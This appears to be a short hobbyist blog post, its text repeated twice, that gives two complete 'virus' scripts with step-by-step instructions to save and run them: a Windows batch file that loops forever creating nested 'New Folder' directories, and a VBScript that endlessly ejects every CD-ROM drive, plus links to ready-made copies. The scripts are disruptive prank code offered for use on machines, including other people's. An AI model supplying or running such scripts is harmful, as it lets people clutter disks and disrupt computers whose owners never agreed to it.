How to create a new folder virus
1)Open a notepad
2)write the code given below
3)
:hackfact
md "New Folder"
cd "New Folder"
goto hackfact
4)Now go to file and click on save as
5)Give anyname with extention as .bat for eg:- virus.bat
6)Now go and click on it.......bingoo...:)
Understand:- Now see what we have actually done here
md=make directory(which orders to create a folder with a name "new folder"
cd=change directory(which after creation of new directory goes into that directory.
now goto hackfact simply makes a loop so that command will run again and again.
download already made New Folder virus
A Virus That Will Open And Close Ur Cdrom
Copy the code below into notepad and save it as anyname.vbs like virus.vbs and then double click on it...what u see....bingo (for saving it click on file then Save as virus.vbs)
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
Now if u want to disable this go to task manager click on process then find wscript.exe and end this process
download "A Virus That Will Open And Close Ur Cdrom" you just need to click and run
1)Open a notepad
2)write the code given below
3)
:hackfact
md "New Folder"
cd "New Folder"
goto hackfact
4)Now go to file and click on save as
5)Give anyname with extention as .bat for eg:- virus.bat
6)Now go and click on it.......bingoo...:)
Understand:- Now see what we have actually done here
md=make directory(which orders to create a folder with a name "new folder"
cd=change directory(which after creation of new directory goes into that directory.
now goto hackfact simply makes a loop so that command will run again and again.
download already made New Folder virus
A Virus That Will Open And Close Ur Cdrom
Copy the code below into notepad and save it as anyname.vbs like virus.vbs and then double click on it...what u see....bingo (for saving it click on file then Save as virus.vbs)
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
Now if u want to disable this go to task manager click on process then find wscript.exe and end this process
download "A Virus That Will Open And Close Ur Cdrom" you just need to click and run
No comments:
Post a Comment